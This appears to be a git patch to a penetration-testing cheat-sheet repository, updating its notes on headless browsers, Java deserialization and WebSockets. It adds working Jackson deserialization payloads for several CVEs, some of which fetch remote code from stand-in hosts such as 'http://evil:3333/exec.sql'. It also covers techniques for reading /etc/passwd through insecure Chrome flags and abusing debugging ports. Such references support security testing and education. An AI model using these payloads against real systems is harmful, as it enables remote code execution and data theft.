From 3fd2f8c4818c3a8b89ea4ad067bc0f5fcb7e8318 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 2 Jul 2025 22:23:13 +0200 Subject: [PATCH] Headless Browser + JSON Jackson --- Headless Browser/README.md | 65 +++++++++++++++++-- Insecure Deserialization/Java.md | 103 ++++++++++++++++++++++++++++++- Web Sockets/README.md | 31 ++++++++++ 3 files changed, 192 insertions(+), 7 deletions(-) diff --git a/Headless Browser/README.md b/Headless Browser/README.md index f22eacf2..604fce40 100644 --- a/Headless Browser/README.md +++ b/Headless Browser/README.md @@ -7,10 +7,11 @@ * [Headless Commands](#headless-commands) * [Local File Read](#local-file-read) -* [Debugging Port](#debugging-port) +* [Remote Debugging Port](#remote-debugging-port) * [Network](#network) * [Port Scanning](#port-scanning) * [DNS Rebinding](#dns-rebinding) +* [CVE](#cve) * [References](#references) ## Headless Commands @@ -37,6 +38,31 @@ Example of headless browsers commands: ## Local File Read +### Insecure Flags + +If the target is launched with the `--allow-file-access` option + +```ps1 +google-chrome-stable --disable-gpu --headless=new --no-sandbox --no-first-run --disable-web-security -–allow-file-access-from-files --allow-file-access --allow-cross-origin-auth-prompt --user-data-dir +``` + +Since the file access is allowed, an atacker can create and expose an HTML file which captures the content of the `/etc/passwd` file. + +```js + +``` + +### PDF Rendering + +Consider a scenario where a headless browser captures a copy of a webpage and exports it to PDF, while the attacker has control over the URL being processed. + Target: `google-chrome-stable --headless[=(new|old)] --print-to-pdf https://site/file.html` * Javascript Redirect @@ -61,7 +87,9 @@ Target: `google-chrome-stable --headless[=(new|old)] --print-to-pdf https://site ``` -## Debugging Port +## Remote Debugging Port + +The Remote Debugging Port in a headless browser (like Headless Chrome or Chromium) is a TCP port that exposes the browser’s DevTools Protocol so external tools (or scripts) can connect and control the browser remotely. It usually listen on port **9222** but it can be changed with `--remote-debugging-port=`. **Target**: `google-chrome-stable --headless=new --remote-debugging-port=XXXX ./index.html` @@ -77,10 +105,21 @@ Target: `google-chrome-stable --headless[=(new|old)] --print-to-pdf https://site * Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices` * Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs -* Dump cookies: -* Stored data: `chrome://settings` +* Data stored in the settings (username, passwords, token): `chrome://settings` * Port Scan: In a loop open `http://localhost:/json/new?http://callback.example.com?port=` * Leak UUID: Iframe: `http://127.0.0.1:/json/version` + + ```json + { + "Browser": "Chrome/136.0.7103.113", + "Protocol-Version": "1.3", + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/136.0.0.0 Safari/537.36", + "V8-Version": "13.6.233.10", + "WebKit-Version": "537.36 (@76fa3c1782406c63308c70b54f228fd39c7aaa71)", + "webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/browser/d815e18d-57e6-4274-a307-98649a9e6b87" + } + ``` + * Local File Read: [pich4ya/chrome_remote_debug_lfi.py](https://gist.github.com/pich4ya/5e7d3d172bb4c03360112fd270045e05) * Node inspector `--inspect` works like a `--remote-debugging-port` @@ -122,6 +161,23 @@ Port Scanning: Timing attack 5. Chrome will attempt to connect to the IPv6 but as it will fail it will fallback to the IPv4 6. From top window, inject script into iframe to exfiltrate content +## CVE + +Exploiting a headless browser using a known vulnerability (CVE) involves several steps, from vulnerability research to payload execution. Below is a structured breakdown of the process: + +Identify the headless browser with the User-Agent, then choose an exploit targeting the browser's component: V8 engine, Blink renderer, Webkit, etc. + +* Chrome CVE: [2024-9122 - WASM type confusion due to imported tag signature subtyping](https://issues.chromium.org/issues/365802567), [CVE-2025-5419 - Out of bounds read and write in V8](https://nvd.nist.gov/vuln/detail/CVE-2025-5419) +* Firefox : [CVE-2024-9680 - Use after free](https://nvd.nist.gov/vuln/detail/CVE-2024-9680) + +The `--no-sandbox` option disables the sandbox feature of the renderer process. + +```js +const browser = await puppeteer.launch({ + args: ['--no-sandbox'] +}); +``` + ## References * [Browser based Port Scanning with JavaScript - Nikolai Tschacher - January 10, 2021](https://incolumitas.com/2021/01/10/browser-based-port-scanning/) @@ -131,3 +187,4 @@ Port Scanning: Timing attack * [Node inspector/CEF debug abuse - HackTricks - July 18, 2024](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse) * [Post-Exploitation: Abusing Chrome's debugging feature to observe and control browsing sessions remotely - wunderwuzzi - April 28, 2020](https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/) * [Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari - Daniel Thatcher - December 6, 2023](https://www.intruder.io/research/split-second-dns-rebinding-in-chrome-and-safari) +* [Too Lazy to get XSS? Then use n-days to get RCE in the Admin bot - Jopraveen - March 2, 2025](https://jopraveen.github.io/web-hackthebot/) diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index 51d4c973..be6e7901 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md @@ -130,8 +130,102 @@ Payload generators for the following marshallers are included: | XStream | **JDK only RCEs** | | YAMLBeans | third party RCE | +## JSON Deserialization + +Multiple libraries can be used to handle JSON in Java. + +* [json-io](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#json-io-json) +* [Jackson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#jackson-json) +* [Fastjson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#fastjson-json) +* [Genson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json) +* [Flexjson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#flexjson-json) +* [Jodd](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#jodd-json) + +**Jackson**: + +Jackson is a popular Java library used for working with JSON (JavaScript Object Notation) data. +Jackson-databind supports Polymorphic Type Handling (PTH), formerly known as "Polymorphic Deserialization", which is disabled by default. + +To determine if the backend is using Jackson, the most common technique is to send an invalid JSON and inspect the error message. Look for references to either of those: + +```java +Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object +``` + +* com.fasterxml.jackson.databind +* org.codehaus.jackson.map + +**Exploitation**: + +* **CVE-2017-7525** + + ```json + { + "param": [ + "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", + { + "transletBytecodes": [ + "yv66v[JAVA_CLASS_B64_ENCODED]AIAEw==" + ], + "transletName": "a.b", + "outputProperties": {} + } + ] + } + ``` + +* **CVE-2017-17485** + + ```json + { + "param": [ + "org.springframework.context.support.FileSystemXmlApplicationContext", + "http://evil/spel.xml" + ] + } + ``` + +* **CVE-2019-12384** + + ```json + [ + "ch.qos.logback.core.db.DriverManagerConnectionSource", + { + "url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'" + } + ] + ``` + +* **CVE-2020-36180** + + ```json + [ + "org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS", + { + "url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://evil:3333/exec.sql'" + } + ] + ``` + +* **CVE-2020-9548** + + ```json + [ + "br.com.anteros.dbcp.AnterosDBCPConfig", + { + "healthCheckRegistry": "ldap://{{interactsh-url}}" + } + ] + ``` + ## YAML Deserialization +* [SnakeYAML](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#snakeyaml-yaml) +* [jYAML](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#jyaml-yaml) +* [YamlBeans](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#yamlbeans-yaml) + +**SnakeYAML**: + SnakeYAML is a popular Java-based library used for parsing and emitting YAML (YAML Ain't Markup Language) data. It provides an easy-to-use API for working with YAML, a human-readable data serialization standard commonly used for configuration files and data exchange. ```yaml @@ -204,15 +298,18 @@ Common secrets from the [documentation](https://cwiki.apache.org/confluence/disp ## References * [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau - March 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/) +* [Exploiting the Jackson RCE: CVE-2017-7525 - Adam Caudill - October 4, 2017](https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/) * [Hack The Box - Arkham - 0xRick - August 10, 2019](https://0xrick.github.io/hack-the-box/arkham/) * [How I found a $1500 worth Deserialization vulnerability - Ashish Kunwar - August 28, 2018](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) * [Jackson CVE-2019-12384: anatomy of a vulnerability class - Andrea Brancaleoni - July 22, 2019](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) +* [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - 22 Jul 2019](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) +* [Jackson Polymorphic Deserialization - FasterXML - July 23, 2020](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization) +* [Java Deserialization Cheat Sheet - Aleksei Tiurin - May 23, 2023](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) * [Java Deserialization in ViewState - Haboob Team - December 23, 2020](https://www.exploit-db.com/docs/48126) -* [Java-Deserialization-Cheat-Sheet - Aleksei Tiurin - May 23, 2023](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) * [JSF ViewState upside-down - Renaud Dubourguais, Nicolas Collignon - March 15, 2016](https://www.synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf) * [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - Peter Stöckli - August 14, 2017](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) -* [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - Peter Stöckli - August 14, 2017](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) -* [On Jackson CVEs: Don’t Panic — Here is what you need to know - cowtowncoder - December 22, 2017](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96) +* [On Jackson CVEs: Don’t Panic — Here is what you need to know - cowtowncoder - December 22, 2017](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062) * [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin (@artsploit) - June 29, 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464) * [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com - July 5, 2020](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/) * [Understanding & practicing java deserialization exploits - Diablohorn - September 9, 2017](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) +* [Friday the 13th JSON Attacks - Alvaro Muñoz & Oleksandr Mirosh - July 28, 2017](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf) diff --git a/Web Sockets/README.md b/Web Sockets/README.md index d9dc308b..dcfd79b4 100644 --- a/Web Sockets/README.md +++ b/Web Sockets/README.md @@ -6,6 +6,8 @@ * [Tools](#tools) * [Methodology](#methodology) + * [Web Socket Protocol](#web-socket-protocol) + * [SocketIO](#socketio) * [Using wsrepl](#using-wsrepl) * [Using ws-harness.py](#using-ws-harnesspy) * [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh) @@ -21,6 +23,34 @@ ## Methodology +### Web Socket Protocol + +WebSockets start as a normal `HTTP/1.1` request and then upgrade the connection to use the WebSocket protocol. + +The client sends a specially crafted HTTP request with headers indicating it wants to switch to the WebSocket protocol: + +```http +GET /chat HTTP/1.1 +Host: example.com:80 +Upgrade: websocket +Connection: Upgrade +Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ== +Sec-WebSocket-Version: 13 +``` + +Server responds with an `HTTP 101 Switching Protocols` response. If the server accepts the request, it replies like this. + +```http +HTTP/1.1 101 Switching Protocols +Upgrade: websocket +Connection: Upgrade +Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo= +``` + +### SocketIO + +Socket.IO is a JavaScript library (for both client and server) that provides a higher-level abstraction over WebSockets, designed to make real-time communication easier and more reliable across browsers and environments. + ### Using wsrepl `wsrepl`, a tool developed by Doyensec, aims to simplify the auditing of websocket-based apps. It offers an interactive REPL interface that is user-friendly and easy to automate. The tool was developed during an engagement with a client whose web application heavily relied on WebSockets for soft real-time communication. @@ -132,6 +162,7 @@ in order to add this header. ## References +* [Cross Site WebSocket Hijacking with socketio - Jimmy Li - August 17, 2020](https://blog.jimmyli.us/articles/2020-08/Cross-Site-WebSocket-Hijacking-With-SocketIO) * [Hacking Web Sockets: All Web Pentest Tools Welcomed - Michael Fowl - March 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) * [Hacking with WebSockets - Mike Shema, Sergey Shekyan, Vaagn Toukharian - September 20, 2012](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf) * [Mini WebSocket CTF - Snowscan - January 27, 2020](https://snowscan.io/bbsctf-evilconneck/#)